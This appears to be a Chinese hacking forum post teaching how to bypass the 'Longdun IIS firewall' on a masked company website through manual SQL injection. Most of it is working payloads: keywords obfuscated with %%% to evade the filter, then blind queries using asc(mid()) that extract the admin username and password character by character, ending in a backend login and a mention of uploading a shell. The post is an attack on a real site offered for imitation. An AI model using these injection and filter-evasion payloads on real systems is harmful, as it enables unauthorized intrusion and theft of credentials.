今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过
好的废话不多说实战开始,
手工注入,工具是不行啦,
第一咱先判断是否有注入点
http://***.com/newsShow.asp?ArticleID=120 ’
http://***.com/newsShow.asp?ArticleID=120 and 1=1
http://***.com/newsShow.asp?ArticleID=120 and 1=2
一直提示 “龙盾IIS防火墙”提示:请不要提交非法信息或恶意访问
我想这个大家应该都不陌生,现在国内用这个的防火墙还挺多的,我看网上资料也比较少呵呵
自己研究了一下
成功突破~
http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=1%20) 返回正常
http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=2%20) 返回错误
呵呵,看来已经成功突破防火墙的限制啦~哈哈~
继续踩解吧~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin)
呵呵返回成功,存在admin表,应该是个access的~是一个公司网站,估计也是access的呵呵
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin)
呵呵返回成功,存在username表
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin)
呵呵返回成功,存在password表
继续往下踩解吧~走吧,
http://***.com/newsShow.asp?ArticleID=(120) order by 1
http://***.com/newsShow.asp?ArticleID=(120) order by 1 order by 1
一直返回错误 看来 order 是用不了了,没办法 只有一个一个的去踩解啦~
先看看管理员用户名有几位吧~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)
一切正常呵呵,不错 RP挺好~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)
账号都出来了, 用计算器转化了下
帐号就是:x2c3m
后面猜解密码~~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密码一共有8位数
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)
密码:b***ad
直接去后台登陆,成功搞定,shell比较简单就不做介绍啦~~
现在的防火墙越来越多,希望与大家多多交流绕过防火墙的技术,有高人有好的方法请留贴….